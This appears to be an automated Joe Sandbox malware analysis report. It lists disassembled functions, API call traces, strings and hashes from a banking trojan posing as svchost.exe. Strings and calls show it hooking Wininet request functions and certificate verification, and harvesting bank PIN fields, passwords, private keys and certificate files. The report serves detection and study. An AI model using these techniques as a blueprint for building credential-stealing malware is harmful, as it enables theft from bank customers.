                                                                                                                                                                                                                • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                                Function 00402A70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7702DB30), ref: 00402AAB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-3112416296
                                                                                                                                                                                                                • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                                • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                                Function 02BC8350 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                                • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                                • API String ID: 3942648141-1626032180
                                                                                                                                                                                                                • Opcode ID: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                                • Instruction ID: 969f26b98f297806455ff3e67c4735cdf336fd5648b271f21f101e84d55a0c1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD124B1A042419FC7228F388C947B6BFE6EF46204B6D46EDE985CB342E736D509CB50
                                                                                                                                                                                                                Function 00403699 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                                • API String ID: 3028510665-3742188657
                                                                                                                                                                                                                • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                                Function 02BCC240 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 362COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 617D73AC$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                                • API String ID: 3912299499-1542089530
                                                                                                                                                                                                                • Opcode ID: 11d4bb0cfed7989e13b5d3a0416d27ebc804357fb050b2f6d41da727234148c9
                                                                                                                                                                                                                • Instruction ID: 26a030f6808de7b4fa85e084009c030c8c6ee34e8dcc56370cb090970b671dd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11d4bb0cfed7989e13b5d3a0416d27ebc804357fb050b2f6d41da727234148c9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E128B0D002599FCB51CFA8D950AEEBBF4EF49340F1085AAD989E7211E7309658CF94
                                                                                                                                                                                                                Function 02BBAAF0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 267COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: P0Wu$open$taskmgr
                                                                                                                                                                                                                • API String ID: 0-1571188809
                                                                                                                                                                                                                • Opcode ID: 29acbfd419b45ae2108619323f4f4e3e6139191a5c07624175525951261f8e99
                                                                                                                                                                                                                • Instruction ID: 272cdda21bc424d3c8aca68ecd098868caaba4cba710364516bec1732888b816
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29acbfd419b45ae2108619323f4f4e3e6139191a5c07624175525951261f8e99
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4691F731E40205EBC720DF68EC88FFA7768EF49356F444A95FA1597291C7B19C21CBA0
                                                                                                                                                                                                                Function 02BD20D0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD20EE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD212F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD216B
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2180
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD218A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2192
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD21A3
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD21AA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD21E2
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BD21EF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0,?,?), ref: 02BD2237
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617d77e0$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 1668326001-612975931
                                                                                                                                                                                                                • Opcode ID: 52e3de3a786761f549f2e1dbca32727e3c12d4f55b0b609dd5811d8570f40f47
                                                                                                                                                                                                                • Instruction ID: a9bba2da42309262e22d092e927aad61981a3ccbe6cfdc271fbfd76bacc4aa35
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e3de3a786761f549f2e1dbca32727e3c12d4f55b0b609dd5811d8570f40f47
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD7124309407859FDB618B389C98BEA7BE8EF45740F5489D4FAC5D7242EB709984CBA0
                                                                                                                                                                                                                Function 02BD01A0 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD01BE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7202), ref: 02BD01EB
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD022D
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD0233
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD023B
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD024C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD0253
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7202,?,?), ref: 02BD02C7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD0305
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617D7202$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu$path.txt
                                                                                                                                                                                                                • API String ID: 2217318736-3041076808
                                                                                                                                                                                                                • Opcode ID: 94aea368a8637c40902ceac5def8f0776fe291b6f0e3e7cb8c97e9cf0cd7bd6b
                                                                                                                                                                                                                • Instruction ID: 5a0345a2d2781055f3560d8dd16b069c15648128d234aa319462c27b37eac927
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94aea368a8637c40902ceac5def8f0776fe291b6f0e3e7cb8c97e9cf0cd7bd6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5711830A447155FDB619B389858BEB7FE8EF45380F4489D4EAC6D7241EB70DA44CB90
                                                                                                                                                                                                                Function 02BD1A60 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 185stringsynchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1B8F
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD1B96
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD1BA3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02BD1BCD
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BD1BF2
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02BC8A50), ref: 02BD1C0F
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BD1C29
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BD1C33
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02BD1C3E
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD1C45
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD1C53
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1C64
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                                • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Wu$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                                • API String ID: 532458909-3260415688
                                                                                                                                                                                                                • Opcode ID: 1853acc88259552f48364d31afcc9591d2d2c1d59b846c08b75b592cccd5022e
                                                                                                                                                                                                                • Instruction ID: 4b66ed6bf3828670c468bd11d27ae282904578014eca3dcf8c952f234d9b90d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1853acc88259552f48364d31afcc9591d2d2c1d59b846c08b75b592cccd5022e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251E831A402096BDB259F7C9C98BEF7BA9EF45785F048594FA4AD7100FB70E94487A0
                                                                                                                                                                                                                Function 02BC1190 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7556F550,00000000), ref: 02BC11AE
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02BC11C4
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,75571620), ref: 02BC11DC
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02BC11FE
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02BC120A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02BC1220
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02BC123C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02BC1258
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02BC1274
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02BC1290
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02BC12AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02BC12C8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02BC12E4
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02BC1300
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                                • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                                • API String ID: 1705253364-835984666
                                                                                                                                                                                                                • Opcode ID: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                                • Instruction ID: f4f6018f828fddebdedf03968135cdc2f13fb75721a995a6c7ad327438100f9c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8631C374B9070A75FA607A794C02F6F235D8F40E84F3005D8BA46F61A7DBE5E6058978
                                                                                                                                                                                                                Function 02BCF030 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02BCF05D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF09E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF0D2
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF0E7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF0F1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF0F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF10A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF111
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF14B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCF158
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280,02BFFDB8,02BFFDB9), ref: 02BCF199
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF1D4
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF1DE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF1E6
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF1F7
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF1FE
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF23B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCF248
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCF420,02BFFDB8,00000000,00000000), ref: 02BCF27E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCF296
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCF2A7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
